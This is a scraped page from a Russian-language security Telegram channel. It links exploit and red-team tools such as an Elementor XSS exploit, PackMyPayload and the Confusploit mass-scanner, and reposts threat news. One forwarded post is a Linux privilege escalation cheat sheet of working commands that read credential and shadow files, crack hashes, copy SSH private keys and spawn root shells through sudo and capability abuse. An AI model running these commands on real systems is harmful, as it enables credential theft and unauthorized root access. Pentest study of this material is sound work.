Похек
16.7K subscribers
2.23K photos
115 videos
243 files
3.16K links
All materials published on the channel are for educational and informational purposes only.

Мнение автора ≠ мнение компании, где работает автор

Чат: @poxek_chat

Реклама: @szybnev или
https://telega.in/c/poxek

РКН: https://clck.ru/3FsVhp
Download Telegram
cve-2022-29455 elementor wordpress plugin xss exploit
While searching for known bugs in Elementor we saw an interesting bug (CVE-2021-24891) that was raised in the past which uses a DOM-XSS to attack a user logged in to the system. Because we already have some knowledge in Javascript and had fun with DOM-XSS together in the past, we decided to deep dive into this CVE.
https://github.com/alirezasalehizadeh/cve-2022-29455

Дневник Безопасника 🛡
👍1
PackMyPayload - Emerging Threat of Containerized Malware
This tool takes a file or directory on input and embeds them into an output file acting as an archive/container. It can serve purpose for a Proof-of-Concept presenting emerging risk of container file formats with embedded malware, as well as helper for professional Red Team Operators to sharpen their Initial Access maneuvers.
https://github.com/mgeeky/PackMyPayload

Дневник Безопасника 🛡
👍1
Forwarded from Monkey Hacker
#linux

Linux Privilege Escalation Cheat Sheet 🗞

🔸Stored Password:
OpenVPN:
1. Попробуйте написать: cat /home/user/myvpn.ovpn
2. Из вывода команды запомните путь: “auth-user-pass”.
3.Следующая команда примерно будет такой: cat /etc/openvpn/auth.txt
History:
1. Попробуйте: cat ~/.bash_history | grep -i passw
🔸Weak File Permission:
1. cat /etc/passwd
2. unshadow <PASSWORD-FILE> <SHADOW-FILE> > unshadowed.txt
3. hashcat -m 1800 unshadowed.txt rockyou.txt -O
🔸SSH-Keys:
1. find / -name authorized_keys 2> /dev/null
2. find / -name id_rsa 2> /dev/null
3. Скопируйте содержимое id_rsa на атакующую машину
4. chmod 400 id_rsa
5. ssh -i id_rsa root@<ip>
🔸Shell-Escalating:
1. Попробуйте выполнить следующее: sudo find /bin -name nano -exec /bin/sh \;
sudo awk 'BEGIN {system("/bin/sh")}'
echo "os.execute('/bin/sh')" > shell.nse && sudo nmap --script=shell.nse
sudo vim -c '!sh'
🔸Abusing Intended Functionality:
На примере Apach2:
sudo apache2 -f /etc/shadow
Уже из основной машины: '[Pasted Root Hash]' > hash.txt И john --wordlist=/usr/share/wordlists/nmap.lst hash.txt
🔸SUID Environment Variables:
1. find / -type f -perm -04000 -ls 2>/dev/null
2. strings /usr/local/bin/suid-env
🔸Capability:
1. getcap -r / 2>/dev/null
2. Запомните значение: “cap_setuid”
3. /usr/bin/python2.6 -c 'import os; os.setuid(0); os.system("/bin/bash")'
👍1
Похищаем сохраненный в Chrome пароль с помощью XSS 

В этой статье я расскажу о том, как с помощью XSS-атаки в сочетании с ClickJacking’ом злоумышленники могут похитить сохраненные в браузере пароли.
👍1😱1
Операторы LockBit используют Windows Defender для загрузки Cobalt Strike

Операторы вредоносной программы LockBit версии 3.0 используют командную строку антивирусной программы Windows Defender для загрузки «маячков» Cobalt Strike на скомпрометированные системы и обхода защитных средств.
3👍1
ВТБ: в июне акивность мошенников возросла в 10 раз

В минувшем месяце специалисты ВТБ выявили около 7 тыс. мошеннических страниц, имитирующих банковские сайты. Этот показатель почти в 10 раз выше майского и в 2,5 раза — суммарного за период с января по май.
👍1
Новый ботнет-рэпер для Linux брутфорсит SSH-серверы

Обнаруженный на днях ботнет “RapperBot” с середины июня 2022 года проводит брутфорс-атаки на SSH-серверы Linux. За основу авторы вредоноса взяли троян Mirai, изменив ряд его особенностей (например, бесконтрольное распространение на максимально доступное число устройств).
👍1
TOP All bugbounty pentesting CVE-2022- POC Exp Things

Table of Contents
- 2022 year top total 30
- 2021 year top total 30
- 2020 year top total 30
- 2019 year top total 30
- 2018 year top total 30
- 2017 year top total 30
- 2016 year top total 30
- 2015 year top total 30
- 2014 year top total 30
- 2013 year top total 30
Доброго времени суток, подписчики! Как вам новый формат постов?
👍5🔥1
Slither

Фреймворк статического анализа Solidity, написанный на Python 3. Он запускает набор детекторов уязвимостей, печатает визуальную информацию о деталях контрактов и предоставляет API для легкого написания пользовательских анализов. Slither позволяет разработчикам находить уязвимости, улучшать понимание кода и быстро создавать прототипы пользовательских анализов.
👍1
confluencePot

Это простой honeypot для уязвимости неаутентифицированной и удаленной инъекции OGNL в Atlassian Confluence (CVE-2022-26134).
👍1
Confusploit

Это скрипт python, который можно использовать с Shodan CLI для массового поиска серверов Confluence, уязвимых к CVE-2022-26134.
One-line установка: 
git clone https://github.com/p4b3l1t0/confusploit.git ; cd confusploit ; pip3 install -r requirements.txt ; chmod +x confusploit.py ; python3 confusploit.py
👍2
HardeningKitty and Windows 10 Hardening

Проект начинался как простой список мер по укреплению Windows 10. Через некоторое время был создан HardeningKitty, чтобы упростить укрепление Windows. Сейчас HardeningKitty поддерживает рекомендации Microsoft, CIS Benchmarks, DoD STIG и BSI SiSyPHuS Win10. И, конечно же, мой собственный список мер по укреплению.
👍1
Критическая RCE-уязвимость угрожает почти 30 моделям роутеров DrayTek

Сотни тысяч маршрутизаторов DrayTek Vigor в опасности из-за новой RCE-уязвимости, обнаруженной исследователями из компании Trellix. Баг затрагивает почти 30 моделей роутеров производителя, которые используются предприятиями малого и среднего бизнеса.
👍1